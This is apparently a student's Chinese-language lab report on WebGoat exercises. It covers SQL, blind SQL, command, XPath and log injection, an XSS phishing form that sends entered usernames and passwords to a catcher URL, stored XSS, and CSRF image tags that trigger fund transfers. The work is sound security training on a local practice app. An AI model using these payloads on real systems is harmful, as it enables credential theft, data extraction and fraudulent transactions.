20154321 Exp9: Web安全基础实践

20154321【网络对抗技术】Exp9: Web安全基础实践

Exp 8 Web基础

一、基础问题

SQL注入攻击原理，如何防御
SQL注入漏洞是指在Web应用对后台数据库查询语句处理存在的安全漏洞。也就是，在输入字符串中嵌入SQL指令，在设计程序中忽略对可能构成攻击的特殊字符串的检查。后台数据库将其认作正常SQL指令后正常执行，可能实现对后台数据库进行各种操作，甚至造成破坏后台数据库等严重后果。
SQL注入一般分为普通注入和盲注。
- 普通注入：后台数据库会回显有价值的提示信息，通过这些可能的报错信息可以更容易地进行注入，适合新手入门训练。
- 盲注：后台管理员在给出错误页面时，没有提供详细错误信息。攻击者需要运用脚本通过仅有的判断信息（比如时间差）对表中的每一个字段进行探测，从而实现注入。
防御：对输入的数据进行过滤，过滤掉敏感字符。加密数据库。
XSS攻击的原理，如何防御
攻击者利用网站漏洞（通常这些漏洞是指网站后台处理程序没有很好的对用户输入进行过滤），输入可以显示在页面上的、对其他用户造成影响的HTML代码；由于受害者浏览器对目标服务器的信任，当其访问目标服务器上被注入恶意脚本的页面后，这段恶意脚本可以顺利执行，实现获取用户cookie并可以利用用户身份进行非法操作的目的。
浏览器自身可以识别简单的XSS攻击字符串，从而阻止简单的XSS攻击；从根本上说，解决办法是消除网站的XSS漏洞，这就需要网站开发者运用转义安全字符等手段。
CSRF攻击原理，如何防御
CSRF攻击的主要目的是让用户在不知情的情况下攻击自己已登录的一个系统，类似于钓鱼。如用户当前已经登录了邮箱，或bbs，同时用户又在使用另外一个，已经被你控制的站点，我们姑且叫它钓鱼网站。这个网站上面可能因为某个图片吸引你，你去点击一下，此时可能就会触发一个js的点击事件，构造一个bbs发帖的请求，去往你的bbs发帖，由于当前你的浏览器状态已经是登陆状态，所以session登陆cookie信息都会跟正常的请求一样，纯天然的利用当前的登陆状态，让用户在不知情的情况下，帮你发帖或干其他事情
通过 referer、token 或者验证码来检测用户提交。尽量不要在页面的链接中暴露用户隐私信息。对于用户修改删除等操作最好都使用post 操作

二、实践过程

1.开启webgoat

在终端中输入java -jar webgoat-container-7.1-exec.jar开启 WebGoat。

打开浏览器，在地址栏输入 localhost:8080/WebGoat 打开 WebGoat，选择默认账号、密码即可登陆成功。

1.SQL字符串注入（String SQL Injection）

SQL注入攻击，入手点在web 但是从根本上来说是SQL的问题。尝试注入一个SQL字符串，以显示所有信用卡号码。尝试使用'Smith'的用户名。

输入'or 1='1，语句就变成SELECT * FROM user_data WHERE last_name = ''or 1='1'，

这句的意思就是查询lastname= '' （或者）1='1' ，这里的 1='1' 永远为真，所以不管姓啥都是对的，都能被显示出来，这是最简单的SQL注入攻击。主要防御方式是字符串过滤。

如下图所示：

2、日志欺骗（Log Spoofing）

日志欺骗主要就是利用日志的格式，使用换行等字符，欺骗管理员。

比如输入huangrui%0d%0aLogin Succeeded for username: admin,密码随意

url参数带有％0d％0a ，在servlet里得到包含这个字段的string时，％0d％0a 就会被转义为回车。

3、数字型SQL注入（Numeric SQL Injection）

题目就是要求这个表单允许使用者看到天气数据，利用SQL注入使得可以看见所有数据

在网页右键选中inspect Element对源代码进行修改，找到任意一个值比如101旁边加上 or 1=1；

然后点击：go, 成功。

4、命令注入（Command Injection）

题目大概就是要尝试给操作系统注入命令行，要求能够在目标主机上执行系统命令

我们还是右击选中inspect Element进行代码修改。

例如在BackDoors.help旁边加上"& netstat -an & ipconfig"。

点击view.

5.XPATH Injection

题目大概意思就是使用帐户Mik/Test123，试着去查看其他员工的数据。

使用一个普通的用户名和密码，XPath会起作用，但是攻击者可能会发送一个坏用户名和密码，并在不知道用户名或密码的情况下，选择一个XML节点，我们也创造一个类似的永真式：

Username: huangrui' or 1=1 or 'a'='a
passwoad:huangrui

6、数字盲注（Blind Numeric SQL Injection）

题目中说明了下面的表单允许用户输入帐号并确定它是否有效，即返回值只有账户有效或无效两种。

先输入101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 10000);，结果是

Invalid account number.无效。所以我们还要缩小范围。

这个时候又显示Account number is valid，也说明确实存在这个账户。

最后经过多次尝试，找到2364

7、盲字符串注入（Blind String SQL Injection）

和上一个差不多，只是由猜数字变成猜字符，方法都差不多。

使用语句 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) < 'K' ) 查询第一个字符。

然后又试了H,它显示无效，所以就可以确定是H到K之间。

然后再使用语句 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2, 1) < 'r' ) 查询第二个字符。

以此类推。最后查询出来为Jill.

Cross-Site Scripting (XSS)

8、跨站脚本钓鱼攻击（Phishing with XSS）

这道题是关于一个页面中存在XSS漏洞时，他如何支持钓鱼攻击。要求我们利用xss和html注入达到这些目标。

使用XSS和HTML插入制作一个钓鱼网站，将下面的代码输在search框中：

</form>

<script>

function hack(){

XSSImage=new Image;

XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";

alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);

}

</script>

<form name="phish">

<br><br>

<HR>

<H2>This feature requires account login:</H2>

<br>

<br>Enter Username:<br> <input type="text" name="user">

<br>Enter Password:<br> <input type="password" name = "pass">

<br> <input type="submit" name="login" value="login" onclick="hack()">

</form>

<br>

<HR>

然后下拉网页，会有用户名和密码的框出现，随意输入用户名和密码

9、存储型xss（Stored XSS Attacks）

这道题是我们要在信息中添加一个html的标签。

那就在信息框里写一句<script>alert("you are so beautiful~");</script>，然后点击提交之后，留言板上会出现这条信息的标题,标题随意。

点击标题

10.

CSRF

Cross Site Request Forgery(CSRF)

要求:需要写一个URL诱使其他用户点击，从而触发CSRF攻击.
我们可以以图片的的形式将URL放进Message框，这时的URL对其他用户是不可见的，用户一旦点击图片，就会触发一个CSRF事件。

1.查看自己电脑的Screen和menu的值

2.在信息框内输入<img src="http://localhost:8080/WebGoat/attack?Screen=2078372&menu=900&transferFunds=1000000"/>（这句话的意思是将Funds即金钱转到自己的账户里）,点击提交之后可以看到信息

3.点进去后，盗取钱财。攻击成功

11.

CSRF Prompt By-Pass

和上一个类似，发个邮件给newsgrooup，包含两个恶意请求：一个是转钱的金额，另一个是确认转账。

1.首先还是查看电脑的Screen和menu的值

2.在信息框输入

<img src="attack?Screen=1471017872&menu=900&transferFunds=5000" 
width="1" height="1"> 
<img src="attack?Screen=1471017872&menu=900&transferFunds=confirm" 
width="1" height="1">